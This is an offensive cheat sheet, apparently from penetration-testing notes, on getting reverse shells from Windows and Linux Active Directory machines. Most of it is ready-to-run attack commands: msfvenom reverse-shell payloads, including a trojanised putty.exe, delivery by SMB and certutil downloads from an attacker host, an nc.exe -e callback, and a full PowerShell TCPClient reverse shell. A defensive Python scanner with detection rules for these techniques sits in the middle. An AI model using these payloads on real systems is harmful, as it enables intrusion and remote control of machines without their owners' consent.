
Reverse Shells

Establish a persistent callback from a Windows or Linux AD machine to your listener. Covers msfvenom payloads, Windows CMD/PowerShell shells and shell stabilisation.


Start Your Listener First

sudo nc -nvlp $ATTACKER_PORT

$ATTACKER_IP and $ATTACKER_PORT are placeholders for the listener's address and port. In the Windows commands below substitute literal values, since cmd.exe does not expand shell-style variables.

MsfVenom — Windows Payloads (exe / msi / dll / exe-service)

EXE payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe -o payload.exe

MSI payload (installed silently on the target with msiexec)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o payload.msi
msiexec /quiet /qn /i C:\Windows\Temp\payload.msi

EXE service (for service exploitation; the binary responds to the service control manager instead of exiting immediately)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o reverse.exe

DLL payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f dll -o payload.dll

Inject into an existing EXE (e.g. putty.exe). The -a value and the payload must share the template binary's architecture: -a x86 with windows/meterpreter/reverse_tcp for a 32-bit template (shown here), -a x64 with windows/x64/meterpreter/reverse_tcp for a 64-bit one; mixing them makes msfvenom abort with an architecture mismatch.
msfvenom -a x86 --platform windows -x putty.exe -k \
  -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
  -b "\x00" -f exe -o puttyX.exe

Host & Deliver the Payload (SMB server / certutil)

Host via impacket SMB server (attacker)
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py share_name .

Copy from SMB on target, then run it
copy \\$ATTACKER_IP\share_name\reverse.exe C:\Windows\Temp\reverse.exe
C:\Windows\Temp\reverse.exe

Download via certutil (target; the files must be served over HTTP on port 8000 from the attacker machine)
certutil -urlcache -split -f "http://$ATTACKER_IP:8000/payload.exe" "payload.exe"
certutil -urlcache -split -f "http://$ATTACKER_IP:8000/nc.exe" "%TEMP%\nc.exe"

Run netcat from target (same path the download above wrote to)
%TEMP%\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT

PowerShell Reverse Shell

Generate one (plain or base64 encoded) at revshells.com
https://www.revshells.com/

Basic PowerShell reverse shell (one line, launched from cmd.exe)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('$ATTACKER_IP',$ATTACKER_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
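One defender-side check for what the two Windows sections above describe, added here as an example rather than taken from this cheat sheet: a small Python scanner that runs rules over constructed Windows process-creation (event 4688) and PowerShell script block (event 4104) records, flags certutil -urlcache downloads, nc.exe -e launches, silent msiexec installs and the TCPClient/iex one-liner, and pulls the callback address out of the script block for triage. The sample records, rule names and patterns are illustrative assumptions, not real telemetry.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample telemetry, not real logs: (event id, command line or script block text).
# 4688 = process creation with command line auditing, 4104 = PowerShell script block logging.
SAMPLE_EVENTS: List[Tuple[int, str]] = [
    (4688, r'certutil.exe -urlcache -split -f "http://10.10.14.5:8000/nc.exe" "C:\Temp\nc.exe"'),
    (4688, r'C:\Temp\nc.exe -e cmd.exe 10.10.14.5 4444'),
    (4688, r'msiexec /quiet /qn /i C:\Windows\Temp\payload.msi'),
    (4104, "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);"
           "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)"),
    (4688, r'certutil -hashfile C:\tools\app.exe SHA256'),  # benign certutil use
    (4104, r'Get-ChildItem C:\Users | Out-String'),          # benign script block
]

# Each rule: name, the event id it applies to, patterns that must ALL be present (case-insensitive).
RULES = [
    ("certutil-download", 4688, [r"certutil(\.exe)?", r"-urlcache", r"https?://"]),
    ("nc-exec-shell", 4688, [r"\bnc(\.exe)?\b", r"\s-e\s+(cmd|powershell)(\.exe)?"]),
    ("msiexec-quiet-install", 4688, [r"msiexec", r"/q(uiet|n)\b", r"/i\s"]),
    ("powershell-tcp-reverse-shell", 4104,
     [r"Net\.Sockets\.TCPClient", r"GetStream\(\)", r"\b(iex|Invoke-Expression)\b"]),
]

CALLBACK_RE = re.compile(r"TCPClient\(\s*'([^']+)'\s*,\s*(\d{1,5})\s*\)")


def match_rule(rule, event_id: int, text: str) -> bool:
    """True when the event type matches the rule and every pattern is found in the text."""
    _name, rule_event_id, patterns = rule
    if event_id != rule_event_id:
        return False
    return all(re.search(p, text, re.IGNORECASE) for p in patterns)


def extract_callback(text: str) -> Optional[Tuple[str, int]]:
    """Pull the listener address and port out of a TCPClient-style script block for triage."""
    m = CALLBACK_RE.search(text)
    return (m.group(1), int(m.group(2))) if m else None


def scan(events) -> List[Tuple[str, int, str]]:
    """Return (rule name, event id, text) for every rule that fires on each event."""
    hits = []
    for event_id, text in events:
        for rule in RULES:
            if match_rule(rule, event_id, text):
                hits.append((rule[0], event_id, text))
    return hits
```

Feed scan() the command line and script block text from your own 4688/4104 exports; the benign certutil -hashfile and Get-ChildItem records in the sample stay silent.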

Stabilise a Linux Shell (pty / stty)

1. Spawn a proper bash shell (use whichever python is present)
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

2. Set the TERM variable
export TERM=xterm

3. Background the shell, put your own terminal in raw mode, then foreground the shell (the stty command runs on the attacker side while the shell is backgrounded)
Ctrl+Z
stty raw -echo; fg
reset